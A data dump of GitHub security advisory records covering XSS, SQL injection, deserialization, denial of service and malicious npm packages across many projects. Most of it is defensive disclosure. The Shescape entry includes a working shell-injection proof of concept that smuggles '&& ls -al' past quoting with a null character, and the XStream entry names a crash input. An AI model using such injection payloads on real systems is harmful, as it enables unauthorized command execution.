{'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-x3v8-c8qx-3j3r', 'https://nvd.nist.gov/vuln/detail/CVE-2021-41215', 'https://github.com/tensorflow/tensorflow/commit/d3738dd70f1c9ceb547258cbb82d853da8771850', 'https://github.com/advisories/GHSA-x3v8-c8qx-3j3r'}
| null |
GHSA
|
GHSA-fpqp-v323-44xv
|
Cross-site scripting in Apache Ranger
|
Policy import functionality in Apache Ranger 0.7.0 to 1.2.0 is vulnerable to a cross-site scripting issue. Upgrade to 2.0.0 or later version of Apache Ranger with the fix.
|
{'CVE-2019-12397'}
|
2021-08-17T20:42:33Z
|
2019-08-16T14:01:35Z
|
MODERATE
| 6.1
|
{'CWE-79'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2019-12397', 'https://github.com/advisories/GHSA-fpqp-v323-44xv', 'https://lists.apache.org/thread.html/cbc6346708ef2b9ffb2555637311bf6294923c609c029389fa39de8f@%3Cdev.ranger.apache.org%3E', 'http://www.openwall.com/lists/oss-security/2019/08/08/1', 'https://cwiki.apache.org/confluence/display/RANGER/Vulnerabilities+found+in+Ranger', 'https://lists.apache.org/thread.html/ab2de1adad96f5dbd19d976b28715dfc60dbe75e82a74f48be8ef695@%3Cdev.ranger.apache.org%3E'}
| null |
GHSA
|
GHSA-8xc6-g8xw-h2c4
|
YARP Denial of Service Vulnerability
|
### Impact
A denial of service vulnerability exists in how YARP processes input.
### Patches
If you're using YARP `1.0.0`, you should update to NuGet package version [`1.0.1`](https://www.nuget.org/packages/Yarp.ReverseProxy/1.0.1).
If you're using YARP `1.1.0-RC.1`, you should update to NuGet package version [`1.1.0-rc.1.22211.2`](https://www.nuget.org/packages/Yarp.ReverseProxy/1.1.0-rc.1.22211.2).
You can do so by updating the `PackageReference` in your `.csproj` file
```diff
<ItemGroup>
- <PackageReference Include="Yarp.ReverseProxy" Version="1.0.0" />
- <PackageReference Include="Yarp.Telemetry.Consumption" Version="1.0.0" />
+ <PackageReference Include="Yarp.ReverseProxy" Version="1.0.1" />
+ <PackageReference Include="Yarp.Telemetry.Consumption" Version="1.0.1" />
</ItemGroup>
```
or by selecting `1.0.1` in the NuGet UI inside Visual Studio (`Manage NuGet Packages` / `Updates`)

### References
[CVE-2022-26924](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26924)
|
{'CVE-2022-26924'}
|
2022-05-03T17:43:20Z
|
2022-04-22T20:23:44Z
|
HIGH
| 7.5
| null |
{'https://github.com/microsoft/reverse-proxy/commit/11e6272da17beb03d0b44a19d3c4f1ffa52b7c38', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26924', 'https://nvd.nist.gov/vuln/detail/CVE-2022-26924', 'https://github.com/microsoft/reverse-proxy/security/advisories/GHSA-8xc6-g8xw-h2c4', 'https://github.com/advisories/GHSA-8xc6-g8xw-h2c4', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26924'}
| null |
GHSA
|
GHSA-9gph-22xh-8x98
|
Unsafe Deserialization in jackson-databind
|
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS.
|
{'CVE-2020-36179'}
|
2022-04-25T22:00:43Z
|
2021-12-09T19:15:54Z
|
HIGH
| 8.1
|
{'CWE-502'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2020-36179', 'https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html', 'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://github.com/advisories/GHSA-9gph-22xh-8x98', 'https://github.com/FasterXML/jackson-databind/issues/3004', 'https://www.oracle.com//security-alerts/cpujul2021.html', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://security.netapp.com/advisory/ntap-20210205-0005/', 'https://lists.apache.org/thread.html/rc255f41d9a61d3dc79a51fb5c713de4ae10e71e3673feeb0b180b436@%3Cissues.spark.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062'}
| null |
GHSA
|
GHSA-f2rp-4rv7-fc95
|
Exposure of Sensitive Information to an Unauthorized Actor in foreman_fog_proxmox
|
A flaw was found in the Foreman project. The Proxmox compute resource exposes the password through the API to an authenticated local attacker with view_hosts permission. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. Versions before foreman_fog_proxmox 0.13.1 are affected
|
{'CVE-2021-20259'}
|
2021-06-16T20:01:38Z
|
2021-06-10T15:54:43Z
|
HIGH
| 7.8
|
{'CWE-200'}
|
{'https://github.com/theforeman/foreman_fog_proxmox/releases/tag/v0.13.1', 'https://github.com/theforeman/foreman_fog_proxmox/pull/184/commits/b7e910bf61563f5d447c71b1b41e2a373a794d7b', 'https://nvd.nist.gov/vuln/detail/CVE-2021-20259', 'https://github.com/advisories/GHSA-f2rp-4rv7-fc95', 'https://bugzilla.redhat.com/show_bug.cgi?id=1932144'}
| null |
GHSA
|
GHSA-h96f-fc7c-9r55
|
Regex denial of service vulnerability in codesample plugin
|
### Impact
A regex denial of service (ReDoS) vulnerability was discovered in a dependency of the `codesample` plugin. The vulnerability allowed poorly formed ruby code samples to lock up the browser while performing syntax highlighting. This impacts users of the `codesample` plugin using TinyMCE 5.5.1 or lower.
### Patches
This vulnerability has been patched in TinyMCE 5.6.0 by upgrading to a version of the dependency without the vulnerability.
### Workarounds
To work around this vulnerability, either:
- Upgrade to TinyMCE 5.6.0 or higher
- Disable the `codesample` plugin
- Disable ruby code samples using the [codesample_languages](https://www.tiny.cloud/docs/plugins/opensource/codesample/#exampleusingcodesample_languages) setting
- Override the PrismJS syntax highlighter to version 1.21.0 or higher using the [codesample_global_prismjs](https://www.tiny.cloud/docs/plugins/opensource/codesample/#codesample_global_prismjs) setting
### Acknowledgements
Tiny Technologies would like to thank Erik Krogh Kristensen at GitHub for discovering this vulnerability.
### References
https://www.tiny.cloud/docs/release-notes/release-notes56/#securityfixes
### For more information
If you have any questions or comments about this advisory:
* Open an issue in the [TinyMCE repo](http://github.com/tinymce/tinymce/issues)
* Email us at [infosec@tiny.cloud](mailto:infosec@tiny.cloud)
| null |
2021-01-06T19:25:46Z
|
2021-01-06T19:25:46Z
|
LOW
| 0
|
{'CWE-400'}
|
{'https://github.com/advisories/GHSA-h96f-fc7c-9r55', 'https://github.com/tinymce/tinymce/security/advisories/GHSA-h96f-fc7c-9r55', 'https://www.tiny.cloud/docs/release-notes/release-notes56/#securityfixes', 'https://www.npmjs.com/package/tinymce'}
| null |
GHSA
|
GHSA-9hc2-w9gg-q6jw
|
Malicious Package in boogeyman
|
All versions of `boogeyman` are considered malicious. This particular package would download a payload from pastebin.com, eval it to read ssh keys and the users `.npmrc` and send them to a private pastebin account.
## Recommendation
This package was published to the npm Registry for a very short period of time. If you happen to find it in your environment you should revoke and rotate your ssh keys and your npm token.
| null |
2021-10-01T13:28:14Z
|
2020-09-01T21:07:41Z
|
CRITICAL
| 9.8
|
{'CWE-506'}
|
{'https://github.com/advisories/GHSA-9hc2-w9gg-q6jw', 'https://www.npmjs.com/advisories/677'}
| null |
GHSA
|
GHSA-r53v-vm87-f72c
|
Moderate severity vulnerability that affects org.apache.axis:axis
|
The getCN function in Apache Axis 1.4 and earlier does not properly verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a certificate with a subject that specifies a common name in a field that is not the CN field. NOTE: this issue exists because of an incomplete fix for CVE-2012-5784.
|
{'CVE-2014-3596'}
|
2021-09-17T14:17:16Z
|
2018-10-16T20:50:58Z
|
MODERATE
| 0
|
{'CWE-297'}
|
{'http://www.securityfocus.com/bid/69295', 'https://lists.apache.org/thread.html/a308887782e05da7cf692e4851ae2bd429a038570cbf594e6631cc8d@%3Cjava-dev.axis.apache.org%3E', 'http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00007.html', 'https://nvd.nist.gov/vuln/detail/CVE-2014-3596', 'https://issues.apache.org/jira/browse/AXIS-2905', 'http://rhn.redhat.com/errata/RHSA-2014-1193.html', 'https://lists.apache.org/thread.html/8aa25c99eeb0693fc229ec87d1423b5ed5d58558618706d8aba1d832@%3Cjava-dev.axis.apache.org%3E', 'https://github.com/advisories/GHSA-r53v-vm87-f72c', 'https://lists.apache.org/thread.html/de2af12dcaba653d02b03235327ca4aa930401813a3cced8e151d29c@%3Cjava-dev.axis.apache.org%3E', 'http://www.openwall.com/lists/oss-security/2014/08/20/2', 'http://www.securitytracker.com/id/1030745', 'http://linux.oracle.com/errata/ELSA-2014-1193.html', 'http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00022.html', 'https://exchange.xforce.ibmcloud.com/vulnerabilities/95377', 'https://lists.apache.org/thread.html/5e6c92145deddcecf70c3604041dcbd615efa2d37632fc2b9c367780@%3Cjava-dev.axis.apache.org%3E', 'https://lists.apache.org/thread.html/44d4e88a5fa8ae60deb752029afe9054da87c5f859caf296fcf585e5@%3Cjava-dev.axis.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujan2020.html', 'http://secunia.com/advisories/61222'}
| null |
GHSA
|
GHSA-xm99-6pv5-q363
|
OS Command injection in github.com/kardianos/service
|
service_windows.go in the kardianos service package for Go omits quoting that is sometimes needed for execution of a Windows service executable from the intended directory.
The validity of this vulnerability has been [questioned](https://github.com/kardianos/service/pull/290#issuecomment-1109831505) and the reporter has requested that the CVE be [disputed](https://github.com/kardianos/service/issues/289#issuecomment-1110546798).
|
{'CVE-2022-29583'}
|
2022-04-28T20:47:58Z
|
2022-04-23T00:03:03Z
|
HIGH
| 0
|
{'CWE-78'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2022-29583', 'https://github.com/advisories/GHSA-xm99-6pv5-q363', 'https://github.com/kardianos/service/issues/289', 'https://github.com/kardianos/service/pull/290'}
| null |
GHSA
|
GHSA-2pmw-cvc7-frvh
|
SQL injection in MCMS
|
A problem was found in ming-soft MCMS v5.1. There is a sql injection vulnerability in /ms/cms/content/list.do
|
{'CVE-2021-44868'}
|
2022-03-01T22:03:05Z
|
2022-02-18T00:00:34Z
|
CRITICAL
| 9.8
|
{'CWE-89'}
|
{'https://github.com/advisories/GHSA-2pmw-cvc7-frvh', 'https://nvd.nist.gov/vuln/detail/CVE-2021-44868', 'https://github.com/ming-soft/MCMS/issues/58'}
| null |
GHSA
|
GHSA-jr2m-29wj-w9qc
|
SQL Injection in FreeTAKServer-UI
|
FreeTAKServer-UI v1.9.8 was discovered to contain a SQL injection vulnerability via the API endpoint /AuthenticateUser.
|
{'CVE-2022-25506'}
|
2022-03-29T21:09:43Z
|
2022-03-12T00:00:37Z
|
MODERATE
| 6.5
|
{'CWE-89'}
|
{'https://github.com/advisories/GHSA-jr2m-29wj-w9qc', 'https://github.com/FreeTAKTeam/UI/issues/27', 'https://nvd.nist.gov/vuln/detail/CVE-2022-25506'}
| null |
GHSA
|
GHSA-jgjc-332c-8cmc
|
SQL injection in phpMyAdmin
|
An issue was discovered in phpMyAdmin before 4.9.2. A crafted database/table name can be used to trigger a SQL injection attack through the designer feature.
|
{'CVE-2019-18622'}
|
2021-08-19T16:24:17Z
|
2020-01-16T21:56:15Z
|
CRITICAL
| 9.8
|
{'CWE-89'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2019-18622', 'http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00002.html', 'https://security.gentoo.org/glsa/202003-39', 'https://www.phpmyadmin.net/security/PMASA-2019-5/', 'https://github.com/advisories/GHSA-jgjc-332c-8cmc', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BA4DGF7KTQS6WA2DRNJSW66L43WB7LRV/', 'http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00024.html', 'https://github.com/phpmyadmin/composer/commit/51acbf53564d9b52e78509a5688ec2b68976b5f7', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W5GW4KEMNCBQYZCIXEJYC42OEBBN2NSH/'}
| null |
GHSA
|
GHSA-mvff-h3cj-wj9c
|
Unprivileged pod using `hostPath` can side-step active LSM when it is SELinux
|
### Impact
Containers launched through containerd’s CRI implementation on Linux systems which use the SELinux security module and containerd versions since v1.5.0 can cause arbitrary files and directories on the host to be relabeled to match the container process label through the use of specially-configured bind mounts in a hostPath volume. This relabeling elevates permissions for the container, granting full read/write access over the affected files and directories. Kubernetes and crictl can both be configured to use containerd’s CRI implementation.
If you are not using containerd’s CRI implementation (through one of the mechanisms described above), you are not affected by this issue.
### Patches
This bug has been fixed in containerd 1.5.9. Because file labels persist independently of containerd, users should both update to these versions as soon as they are released and validate that all files on their host are correctly labeled.
### Workarounds
Ensure that no sensitive files or directories are used as a hostPath volume source location. Policy enforcement mechanisms such a Kubernetes Pod Security Policy [AllowedHostPaths](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#volumes-and-file-systems) may be specified to limit the files and directories that can be bind-mounted to containers.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [containerd](https://github.com/containerd/containerd/issues/new/choose)
* Email us at [security@containerd.io](mailto:security@containerd.io)
|
{'CVE-2021-43816'}
|
2022-02-16T22:03:34Z
|
2022-01-06T17:36:59Z
|
HIGH
| 8
|
{'CWE-281'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2021-43816', 'https://github.com/containerd/containerd/security/advisories/GHSA-mvff-h3cj-wj9c', 'https://github.com/dweomer/containerd/commit/f7f08f0e34fb97392b0d382e58916d6865100299', 'https://github.com/advisories/GHSA-mvff-h3cj-wj9c', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MPDIZMI7ZPERSZE2XO265UCK5IWM7CID/', 'https://github.com/containerd/containerd/commit/a731039238c62be081eb8c31525b988415745eea', 'https://github.com/containerd/containerd/issues/6194', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GD5GH7NMK5VJMA2Y5CYB5O5GTPYMWMLX/'}
| null |
GHSA
|
GHSA-xxgp-pcfc-3vgc
|
Privilege Escalation in Hibernate Validator
|
In Hibernate Validator 5.2.x before 5.2.5 final, 5.3.x, and 5.4.x, it was found that when the security manager's reflective permissions, which allows it to access the private members of the class, are granted to Hibernate Validator, a potential privilege escalation can occur. By allowing the calling code to access those private members without the permission an attacker may be able to validate an invalid instance and access the private member value via ConstraintViolation#getInvalidValue().
|
{'CVE-2017-7536'}
|
2022-03-31T22:00:46Z
|
2020-06-15T19:57:48Z
|
HIGH
| 7
|
{'CWE-470'}
|
{'https://github.com/hibernate/hibernate-validator/commit/0886e89900d343ea20fde5137c9a3086e6da9ac', 'https://access.redhat.com/errata/RHSA-2017:3456', 'http://www.securityfocus.com/bid/101048', 'https://access.redhat.com/errata/RHSA-2018:3817', 'https://github.com/hibernate/hibernate-validator/commit/0778a5c98b817771a645c6f4ba0b28dd8b5437b', 'https://access.redhat.com/errata/RHSA-2017:2808', 'https://access.redhat.com/errata/RHSA-2017:3458', 'https://nvd.nist.gov/vuln/detail/CVE-2017-7536', 'https://access.redhat.com/errata/RHSA-2017:2809', 'https://access.redhat.com/errata/RHSA-2017:3455', 'https://access.redhat.com/errata/RHSA-2018:2740', 'http://www.securitytracker.com/id/1039744', 'https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2018:2742', 'https://access.redhat.com/errata/RHSA-2017:3141', 'https://access.redhat.com/errata/RHSA-2017:3454', 'https://access.redhat.com/errata/RHSA-2017:2811', 'https://access.redhat.com/errata/RHSA-2017:2810', 'https://bugzilla.redhat.com/show_bug.cgi?id=1465573', 'https://github.com/advisories/GHSA-xxgp-pcfc-3vgc', 'https://access.redhat.com/errata/RHSA-2018:2743', 'https://access.redhat.com/errata/RHSA-2018:2741', 'https://access.redhat.com/errata/RHSA-2018:2927'}
| null |
GHSA
|
GHSA-j23j-q57m-63v3
|
Denial of service in DataCommunicator class in Vaadin 8
|
Missing check in `DataCommunicator` class in `com.vaadin:vaadin-server` versions 8.0.0 through 8.14.0 (Vaadin 8.0.0 through 8.14.0) allows authenticated network attacker to cause heap exhaustion by requesting too many rows of data.
| null |
2021-10-13T18:54:50Z
|
2021-10-13T18:54:50Z
|
MODERATE
| 4.3
|
{'CWE-400'}
|
{'https://vaadin.com/security/cve-2021-33609', 'https://github.com/vaadin/framework/security/advisories/GHSA-j23j-q57m-63v3', 'https://github.com/vaadin/framework/pull/12415', 'https://github.com/advisories/GHSA-j23j-q57m-63v3'}
| null |
GHSA
|
GHSA-qq74-vgcf-54c3
|
Cross-site Scripting in ShowDoc
|
ShowDoc is vulnerable to stored cross-site scripting via viva cshtm file upload in in versions 2.10.3 and prior. A patch is available and anticipated to be part of version 2.10.4.
|
{'CVE-2022-0946'}
|
2022-03-23T15:38:13Z
|
2022-03-15T00:01:00Z
|
MODERATE
| 5.4
|
{'CWE-79'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2022-0946', 'https://github.com/advisories/GHSA-qq74-vgcf-54c3', 'https://github.com/star7th/showdoc/commit/e5d575928b1371a7e07b09b6592822298335062a', 'https://huntr.dev/bounties/1f8f0021-396e-428e-9748-dd4e359715e1'}
| null |
GHSA
|
GHSA-6jmf-mxwf-r3jc
|
Exposure of Sensitive Information to an Unauthorized Actor in Apache Kafka
|
When Connect workers in Apache Kafka 2.0.0, 2.0.1, 2.1.0, 2.1.1, 2.2.0, 2.2.1, or 2.3.0 are configured with one or more config providers, and a connector is created/updated on that Connect cluster to use an externalized secret variable in a substring of a connector configuration property value, then any client can issue a request to the same Connect cluster to obtain the connector's task configuration and the response will contain the plaintext secret rather than the externalized secrets variables.
|
{'CVE-2019-12399'}
|
2022-04-22T17:26:58Z
|
2020-05-12T00:39:27Z
|
HIGH
| 7.5
|
{'CWE-319'}
|
{'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://www.oracle.com/security-alerts/cpujan2021.html', 'https://lists.apache.org/thread.html/rda253155601968331b5cf0da4f273813bbd91843c2568a8495d1c662@%3Ccommits.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r0e3a613705d70950aca2bfe9a6265c87503921852d9a3dbce512ca9f@%3Ccommits.druid.apache.org%3E', 'https://lists.apache.org/thread.html/rfe90ca0463c199b99c2921410639aed53a172ea8b733eab0dc776262@%3Ccommits.druid.apache.org%3E', 'https://lists.apache.org/thread.html/r4d9e87cdae99e98d7b244cfa53d9d2532d368d3a187fbc87c493dcbe@%3Ccommits.druid.apache.org%3E', 'https://lists.apache.org/thread.html/r6fa1cff4786dcef2ddd1d717836ef123c878e8321c24855bad24ae0f@%3Ccommits.druid.apache.org%3E', 'https://github.com/advisories/GHSA-6jmf-mxwf-r3jc', 'https://lists.apache.org/thread.html/rc27d424d0bdeaf31081c3e246db3c66e882243ae3f342dfa845e0261@%3Ccommits.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r6af5ed95726874e9add022955be83c192428c248d1c9a1914aff89d9%40%3Cdev.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r9871a4215b621c1d09deee5eba97f0f44fde01b4363deb1bed0dd160@%3Ccommits.druid.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://lists.apache.org/thread.html/r3154f5adbc905f1f9012a92240c8e00a96628470cc819453b9606d0e@%3Ccommits.druid.apache.org%3E', 'https://lists.apache.org/thread.html/r6af5ed95726874e9add022955be83c192428c248d1c9a1914aff89d9@%3Cannounce.apache.org%3E', 'https://lists.apache.org/thread.html/r6af5ed95726874e9add022955be83c192428c248d1c9a1914aff89d9@%3Cusers.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r801c68bf987931f35d2e24ecc99f3aa2850fdd8f5ef15fe6c60fecf3@%3Ccommits.druid.apache.org%3E', 'https://lists.apache.org/thread.html/r47c225db363d1ee2c18c4b3b2f51b63a9789f78c7fa602e5976ecd05@%3Ccommits.druid.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2019-12399', 'https://lists.apache.org/thread.html/r56eb055b544931451283fee51f7e1f5b8ebd3085fed7d77aaba504c9@%3Ccommits.druid.apache.org%3E', 'https://lists.apache.org/thread.html/r8890b8f18f1de821595792b58b968a89692a255bc20d86d395270740@%3Ccommits.druid.apache.org%3E', 'https://lists.apache.org/thread.html/r4b20b40c40d4a4c641e2ef4228098a57935e5782bfdfdf3650e48265@%3Ccommits.druid.apache.org%3E', 'https://lists.apache.org/thread.html/rde947ee866de6687bc51cdc8dfa6d7e6b3ad4ce8c708c344f773e6dc@%3Ccommits.druid.apache.org%3E', 'https://snyk.io/vuln/SNYK-JAVA-ORGAPACHEKAFKA-541854', 'http://www.openwall.com/lists/oss-security/2020/01/14/1', 'https://lists.apache.org/thread.html/r2d390dec5f360ec8aa294bef18e1a4385e2a3698d747209216f5a48b@%3Ccommits.druid.apache.org%3E', 'https://lists.apache.org/thread.html/r3203d7f25a6ca56ff3e48c43a6aa7cb60b8e5d57d0eed9f76dc2b7a8@%3Ccommits.druid.apache.org%3E', 'https://www.oracle.com//security-alerts/cpujul2021.html'}
| null |
GHSA
|
GHSA-pmfr-63c2-jr5c
|
Execution Control List (ECL) Is Insecure in Singularity
|
### Impact
The Singularity Execution Control List (ECL) allows system administrators to set up a policy that defines rules about what signature(s) must be (or must not be) present on a SIF container image for it to be permitted to run.
In Singularity 3.x versions below 3.6.0, the following issues allow the ECL to be bypassed by a malicious user:
* Image integrity is not validated when an ECL policy is enforced.
* The fingerprint required by the ECL is compared against the signature object descriptor(s) in the SIF file, rather than to a cryptographically validated signature. Thus, it is trivial to craft an arbitrary payload which will be permitted to run, even if the attacker does not have access to the private key associated with the fingerprint(s) configured in the ECL.
### Patches
These issues are addressed in Singularity 3.6.0.
All users are advised to upgrade to 3.6.0. Note that Singularity 3.6.0 uses a new signature format that is necessarily incompatible with Singularity < 3.6.0 - e.g. Singularity 3.5.3 cannot verify containers signed by 3.6.0.
Version 3.6.0 includes a `legacyinsecure` option that can be set to `legacyinsecure = true` in `ecl.toml` to allow the ECL to perform verification of the older, and insecure, legacy signatures for compatibility with existing containers. This does not guarantee that containers have not been modified since signing, due to other issues in the legacy signature format. The option should be used only to temporarily ease the transition to containers signed with the new 3.6.0 signature format.
### Workarounds
This issue affects any installation of Singularity configured to use the Execution Control List (ECL) functionality. There is no workaround if ECL is required.
### For more information
General questions about the impact of the advisory / changes made in the 3.6.0 release can be asked in the:
* [Singularity Slack Channel](https://bit.ly/2m0g3lX)
* [Singularity Mailing List](https://groups.google.com/a/lbl.gov/forum/??sdf%7Csort:date#!forum/singularity)
Any sensitive security concerns should be directed to: security@sylabs.io
See our Security Policy here: https://sylabs.io/security-policy
|
{'CVE-2020-13845'}
|
2022-04-19T19:02:30Z
|
2021-12-20T18:24:30Z
|
HIGH
| 7.5
|
{'CWE-347', 'CWE-354'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2020-13845', 'http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00053.html', 'https://github.com/advisories/GHSA-pmfr-63c2-jr5c', 'https://github.com/hpcng/singularity/security/advisories/GHSA-pmfr-63c2-jr5c', 'http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00046.html', 'http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00059.html'}
| null |
GHSA
|
GHSA-mfc2-93pr-jf92
|
Malicious code in `loadyaml`
|
npm packages `loadyaml` and `electorn` were removed from the npm registry for containing malicious code. Upon installation the package runs a preinstall script that writes a public comment on GitHub containing the following information:
- IP and IP-based geolocation
- home directory name
- local username
The malicious packages have been removed from the npm registry and the leaked content removed from GitHub.
| null |
2021-10-04T21:21:29Z
|
2020-10-01T17:10:15Z
|
CRITICAL
| 0
|
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1563', 'https://github.com/advisories/GHSA-mfc2-93pr-jf92'}
| null |
GHSA
|
GHSA-f2rp-38vg-j3gh
|
Null characters not escaped
|
### Impact
Anyone using _Shescape_ to defend against shell injection may still be vulnerable against shell injection if the attacker manages to insert a [null character](https://en.wikipedia.org/wiki/Null_character) into the payload. For example (on Windows):
```javascript
const cp = require("child_process");
const shescape = require("shescape");
const nullChar = String.fromCharCode(0);
const payload = "foo\" && ls -al ${nullChar} && echo \"bar";
console.log(cp.execSync(`echo ${shescape.quote(payload)}`));
// foototal 3
// drwxr-xr-x 1 owner XXXXXX 0 Mar 13 18:44 .
// drwxr-xr-x 1 owner XXXXXX 0 Mar 13 00:09 ..
// drwxr-xr-x 1 owner XXXXXX 0 Mar 13 18:42 folder
// -rw-r--r-- 1 owner XXXXXX 0 Mar 13 18:42 file
```
### Patches
The problem has been patched in [v1.1.3](https://github.com/ericcornelissen/shescape/releases/tag/v1.1.3) which you can upgrade to now. No further changes are required.
### Workarounds
Alternatively, null characters can be stripped out manually using e.g. `arg.replace(/\u{0}/gu, "")`
|
{'CVE-2021-21384'}
|
2021-03-22T14:18:23Z
|
2021-03-18T23:47:56Z
|
HIGH
| 6.3
|
{'CWE-88'}
|
{'https://github.com/ericcornelissen/shescape/releases/tag/v1.1.3', 'https://github.com/advisories/GHSA-f2rp-38vg-j3gh', 'https://github.com/ericcornelissen/shescape/security/advisories/GHSA-f2rp-38vg-j3gh', 'https://github.com/ericcornelissen/shescape/commit/07a069a66423809cbedd61d980c11ca44a29ea2b', 'https://www.npmjs.com/package/shescape', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21384'}
| null |
GHSA
|
GHSA-28mg-98xm-q493
|
Open Redirect in archivy
|
archivy prior to version 1.7.1 is vulnerable to open redirect.
|
{'CVE-2022-0697'}
|
2022-04-05T00:13:22Z
|
2022-03-08T00:00:32Z
|
MODERATE
| 6.1
|
{'CWE-601'}
|
{'https://github.com/pypa/advisory-database/tree/main/vulns/archivy/PYSEC-2022-161.yaml', 'https://huntr.dev/bounties/2d0301a2-10ff-48f4-a346-5a0e8707835b', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0697', 'https://github.com/archivy/archivy/releases/tag/v1.7.1', 'https://github.com/archivy/archivy/commit/2d8cb29853190d42572b36deb61127e68d6be574', 'https://github.com/advisories/GHSA-28mg-98xm-q493'}
| null |
GHSA
|
GHSA-h24f-9mm4-w336
|
Cross-site Scripting (XSS) - Stored in crud-file-server
|
Versions of `crud-file-server` before 0.8.0 are vulnerable to stored cross-site scripting (XSS). This is due to insufficient santiziation of filenames when directory index is served by `crud-file-server`.
## Recommendation
Update to version 0.8.0 or later.
|
{'CVE-2018-3726'}
|
2021-01-08T18:44:58Z
|
2018-07-18T18:34:27Z
|
CRITICAL
| 0
|
{'CWE-79'}
|
{'https://hackerone.com/reports/311101', 'https://github.com/omphalos/crud-file-server/commit/4155bfe068bf211b49a0b3ffd06e78cbaf1b40fa', 'https://nvd.nist.gov/vuln/detail/CVE-2018-3726', 'https://github.com/advisories/GHSA-h24f-9mm4-w336', 'https://www.npmjs.com/advisories/570'}
| null |
GHSA
|
GHSA-5p9f-55j8-922m
|
Moderate severity vulnerability that affects doorkeeper
|
Withdrawn, accidental duplicate publish.
The Doorkeeper gem before 4.2.0 for Ruby might allow remote attackers to conduct replay attacks or revoke arbitrary tokens by leveraging failure to implement the OAuth 2.0 Token Revocation specification.
| null |
2021-12-02T23:15:16Z
|
2018-08-13T20:49:10Z
|
MODERATE
| 0
| null |
{'https://nvd.nist.gov/vuln/detail/CVE-2016-6582', 'https://github.com/advisories/GHSA-5p9f-55j8-922m'}
| null |
GHSA
|
GHSA-7hwc-46rm-65jh
|
Denial of service in XStream
|
XStream through 1.4.9, when a certain denyTypes workaround is not used, mishandles attempts to create an instance of the primitive type 'void' during unmarshalling, leading to a remote application crash, as demonstrated by an xstream.fromXML("<void/>") call.
|
{'CVE-2017-7957'}
|
2021-09-22T18:46:26Z
|
2020-06-30T22:48:24Z
|
HIGH
| 7.5
|
{'CWE-20'}
|
{'https://github.com/x-stream/xstream/commit/b3570be2f39234e61f99f9a20640756ea71b1b4', 'https://github.com/advisories/GHSA-7hwc-46rm-65jh', 'https://access.redhat.com/errata/RHSA-2017:1832', 'https://github.com/x-stream/xstream/commit/8542d02d9ac5d384c85f4b33d6c1888c53bd55d', 'https://access.redhat.com/errata/RHSA-2017:2888', 'https://exchange.xforce.ibmcloud.com/vulnerabilities/125800', 'http://www.debian.org/security/2017/dsa-3841', 'https://access.redhat.com/errata/RHSA-2017:2889', 'http://x-stream.github.io/CVE-2017-7957.html', 'https://github.com/x-stream/xstream/commit/6e546ec366419158b1e393211be6d78ab9604ab', 'https://nvd.nist.gov/vuln/detail/CVE-2017-7957', 'http://www.securityfocus.com/bid/100687', 'https://www-prd-trops.events.ibm.com/node/715749', 'http://www.securitytracker.com/id/1039499'}
| null |
GHSA
|
GHSA-whv6-rj84-2vh2
|
Cross-Site Scripting in nextcloud-vue-collections
|
Versions of `nextcloud-vue-collections` prior to 0.4.2 are vulnerable to Cross-Site Scripting (XSS). The `v-tooltip` component has an insecure `defaultHTML` configuration that allows arbitrary JavaScript to be injected in the tooltip of a collection item. This allows attackers to execute arbitrary code in a victim's browser.
## Recommendation
Upgrade to version 0.4.2 or later.
| null |
2021-10-04T20:36:43Z
|
2020-09-04T17:21:58Z
|
HIGH
| 0
|
{'CWE-79'}
|
{'https://github.com/advisories/GHSA-whv6-rj84-2vh2', 'https://github.com/juliushaertl/nextcloud-vue-collections/commit/8ec1fca214f003538cec4137792ede928f25f583', 'https://www.npmjs.com/advisories/1442'}
| null |
GHSA
|
